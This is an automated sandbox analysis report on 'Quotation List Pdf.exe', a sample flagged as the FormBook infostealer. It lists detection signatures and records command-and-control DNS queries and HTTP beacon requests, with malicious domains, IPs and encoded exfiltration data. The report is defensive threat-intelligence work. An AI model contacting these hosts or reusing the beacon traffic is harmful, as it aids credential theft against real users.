Windows Analysis Report
Quotation List Pdf.exe

Overview

General Information

Sample name: Quotation List Pdf.exe
Analysis ID: 1465353
MD5: 9cfd62fc26438eeb8a50922265ad0ea7
SHA1: 6bf1e9ab8b0d0c486b85649cf3bc8c1db4b21b01
SHA256: 7eaa347573db3f24316a9ab2d30256db4d35105c7d93f9dbf8d860ec99949280
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses regedit.exe to modify the Windows registry
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: Quotation List Pdf.exe ReversingLabs: Detection: 47%
Yara detected FormBook
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3299718726.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3299617930.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1557934690.0000000007A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1557553662.0000000005780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3302954162.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: Quotation List Pdf.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: PING.EXE, 00000007.00000002.3302803643.00000000040DC000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3301719509.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624939934.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.1846037806.0000000022D1C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tiwTBKVufjvhPL.exe, 00000006.00000002.3297786595.00000000000FE000.00000002.00000001.01000000.00000004.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624296324.00000000000FE000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1557633675.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1559396373.0000000003668000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, PING.EXE, 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1557633675.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1559396373.0000000003668000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: ping.pdbGCTL source: vbc.exe, 00000005.00000002.1557401565.00000000052B8000.00000004.00000020.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000006.00000002.3299029778.0000000000788000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: vbc.pdb source: PING.EXE, 00000007.00000002.3302803643.00000000040DC000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3301719509.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624939934.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.1846037806.0000000022D1C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: ping.pdb source: vbc.exe, 00000005.00000002.1557401565.00000000052B8000.00000004.00000020.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000006.00000002.3299029778.0000000000788000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_0309BE10 FindFirstFileW,FindNextFileW,FindClose, 7_2_0309BE10
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 4x nop then push rbx 0_2_00007FF768431C50
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 4x nop then push rbx 0_2_00007FF768431C50
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 4x nop then push rbx 0_2_00007FF7684BDD30
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 4x nop then sub rsp, 28h 0_2_00007FF7684BDD30
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 4x nop then push rbx 0_2_00007FF7684BDD30
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 4x nop then push rbx 0_2_00007FF7684BDD30
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 4x nop then push rbx 0_2_00007FF7684BDD30
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 4x nop then push rbx 0_2_00007FF7684BDD30
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 4x nop then push rbx 0_2_00007FF7684BDD30
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 4x nop then sub rsp, 28h 0_2_00007FF7684BDD30
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 4x nop then push rsi 0_2_00007FF7684BDD30
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 4x nop then push rdi 0_2_00007FF7684BDD30
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 4x nop then push rdi 0_2_00007FF7684F3D20
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 4x nop then push r14 0_2_00007FF76856D7E0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 4x nop then xor eax, eax 7_2_030896A0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 4x nop then mov ebx, 00000004h 7_2_03660542

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.2.8:49713 -> 3.33.244.179:80
Performs DNS queries to domains with low reputation
Source: DNS query: www.ngkwnq.xyz
Source: DNS query: www.ajjmamlllqqq.xyz
Uses ping.exe to check the status of other devices and networks
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Process created: C:\Windows\SysWOW64\PING.EXE "C:\Windows\SysWOW64\PING.EXE"
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 76.223.105.230 76.223.105.230
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /z6sg/?hv=zih0DoxsYMMKz8ZABxgT1WFK2McCJpyMbPq/OME2Y84w2Vm66kFudiKZ8IXY1l1UIMuRoxNGX/afyyUEkrlqrKni6t8ICyCnTx8av+sD3Gyos8WHaN8U0OpOBqhAw2rkZw==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.evoolihubs.shopConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic HTTP traffic detected: GET /4xhu/?hv=kUigRkBAqBt1RQ4PHNukF4xZPToH+1QI6otQDXJCvCY9YbUgfI2Re+iS8c4dlot+geZi3vfTzLYXZH9sWq6jT8j+eYYKaAUwNfi+eLrrbumEku+3ygxonLPUoh3L9hGJlw==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.mycaringfriend.onlineConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic HTTP traffic detected: GET /o2rg/?hv=HosprsjiipEFZkdlXtfyIs2HS8VP0Lx1JctxEV0LpDy1TX4kdcFD2HTZ1ZNwt0d2CmaO7pR5URztAlcHvOxdSj57tnDbyp24LsG2z7IhVzqV3j0gtM8YC4wacEpxZhptTA==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.marttyes.topConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic HTTP traffic detected: GET /v1kj/?hv=doj+6iUDZydJqFVnCXjkp3F4RUW5KXgrYHqPdL8oMaa0q7VqYsyQxdbUVD3Fk32bJgHvLY4KB1BicN6WuEPq/9BNjeLnpFWO+QoiBFVxHjC/ELqB/38Ky5muYdCtwXhrYw==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.sponsoraveteran.infoConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic HTTP traffic detected: GET /e5ni/?hv=5igWVKYME1F2HJuEqzDD4BytRWNfFWn6ld9EO0nuwIC7ejuHGgZWNZHr69K3UvIzgGWBTOng6QRLO5bRM99dWtUQcUECcC3CaxVjbCwQta3fR2FUS95NK5IjfJQajbbRQA==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.yvw66.topConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic HTTP traffic detected: GET /vapn/?hv=zIQCtJPr8f6IEHIEo3TNC67HH9mmSCxic5WS7/A3sw1OteiabhN4nVuyPRk+K2L+MLR9kC9TPTQdF4ehIT0bCTCmTt1bteoRMu1plsZV53w6ucKr+pMiAUHXVfrsn+3QcA==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.fundraiserstuffies.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic HTTP traffic detected: GET /8lwi/?hv=VRq/gdJR4rGg5JPfAG5ylFJXonLci7il5oNXQSZCeVYj1ovZxvPBP2fSASRs9V/B8emNhLugTvQrnEJ4A2g8ywXJhi2TGyyLJT3xrxwpBdhnsBD5VEgEmoQil+34l9QVbw==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.aquamotricidad.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic HTTP traffic detected: GET /fuua/?hv=3fNRerFIk63V1+IMAu4qlsMdt7YNs0EnlFsxF2g0jvBo5aDcf8mM3XhGrDpzzYUjwL0bjZmkMy0lhAUZIEhvtJpfy2aMBt81fLEje/cDaztKC30TKJAPkx8cZzQFh5/qVA==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.te74y.topConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic HTTP traffic detected: GET /44zl/?hv=cT3mCg7Cmib/+TsqKgcGcLNa3rN7XS3dP4LITboVuuCqI7qZSFFYJV7Jt59+pqQMU8QRjoSmjIZC25OqP8KY8gmteTpLVZlDreUlLLyNnWL1wa1Nczp2K6xKprp1RRbIsA==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.ngkwnq.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic HTTP traffic detected: GET /jtz4/?hv=r1qQkpPieaVsNUG68+02NppS6IukHQ6wFXr4oQU+uO/CVftnLbVi7u9JfCXfhwamzeJuyCR7X8qwC2gN3XV8echUBAJmUx7G1CfEdwxlKk1EGrOsAByXTICV/hREjOoViQ==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.eoghenluire.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic HTTP traffic detected: GET /17ef/?hv=BkwgEDM72plk1SoNdv8pOFX/Y0L1Y0wMy+4dvxwo/Oj/80wh3Wvb7+zqtjdXyImQl2Jnvy48BKhjFvscwh0k3TFr3WzonWtP3CiK72Em1Tp7LQVto/HSEXKZGZ++Ap7pGg==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.poodlemum.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic HTTP traffic detected: GET /5lw2/?hv=iESIo6eVsdqcOmRYuFlUcr07YKkPV6iF6CPlu5h9EhLBhYFmo+CVfgok2cyX/3C89hOXIPK4L028RRlOYTTbn0S9j8UWgSdZAw9+mXeQ1LVvSh67jDUK/iIxNMtsobgO7w==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.ajjmamlllqqq.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic DNS traffic detected: DNS query: www.evoolihubs.shop
Source: global traffic DNS traffic detected: DNS query: www.mycaringfriend.online
Source: global traffic DNS traffic detected: DNS query: www.marttyes.top
Source: global traffic DNS traffic detected: DNS query: www.sponsoraveteran.info
Source: global traffic DNS traffic detected: DNS query: www.yvw66.top
Source: global traffic DNS traffic detected: DNS query: www.fundraiserstuffies.com
Source: global traffic DNS traffic detected: DNS query: www.aquamotricidad.com
Source: global traffic DNS traffic detected: DNS query: www.te74y.top
Source: global traffic DNS traffic detected: DNS query: www.ngkwnq.xyz
Source: global traffic DNS traffic detected: DNS query: www.eoghenluire.com
Source: global traffic DNS traffic detected: DNS query: www.poodlemum.com
Source: global traffic DNS traffic detected: DNS query: www.ajjmamlllqqq.xyz
Source: unknown HTTP traffic detected: POST /4xhu/ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brHost: www.mycaringfriend.onlineOrigin: http://www.mycaringfriend.onlineContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Content-Length: 203Connection: closeReferer: http://www.mycaringfriend.online/4xhu/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0Data Raw: 68 76 3d 70 57 4b 41 53 51 42 48 6b 47 35 58 51 42 45 6e 49 39 75 6a 42 75 56 4e 58 53 6b 63 67 53 6b 62 39 6f 31 4c 4d 68 42 54 79 32 30 6f 55 66 35 31 59 37 65 56 56 66 32 59 34 37 67 7a 74 73 38 48 70 75 45 62 75 2f 66 64 39 39 63 42 53 67 78 37 5a 65 6d 52 5a 4d 66 66 63 4a 77 6b 57 32 51 61 4e 73 61 38 66 71 33 4a 46 35 48 38 78 70 4b 56 78 43 51 58 37 71 6d 44 6b 51 66 71 78 54 50 42 37 30 4d 57 2f 6b 38 73 51 66 63 45 2f 51 5a 74 73 32 61 2f 39 49 31 54 37 6a 79 49 44 37 38 67 6e 76 50 34 34 58 35 64 74 6e 4b 55 57 78 6a 52 77 61 78 43 4b 37 56 35 53 66 73 65 34 5a 79 79 69 4e 64 62 6b 63 45 3d Data Ascii: hv=pWKASQBHkG5XQBEnI9ujBuVNXSkcgSkb9o1LMhBTy20oUf51Y7eVVf2Y47gzts8HpuEbu/fd99cBSgx7ZemRZMffcJwkW2QaNsa8fq3JF5H8xpKVxCQX7qmDkQfqxTPB70MW/k8sQfcE/QZts2a/9I1T7jyID78gnvP44X5dtnKUWxjRwaxCK7V5Sfse4ZyyiNdbkcE=
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:45:16 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:45:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:45:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:45:23 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Jul 2024 13:45:43 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
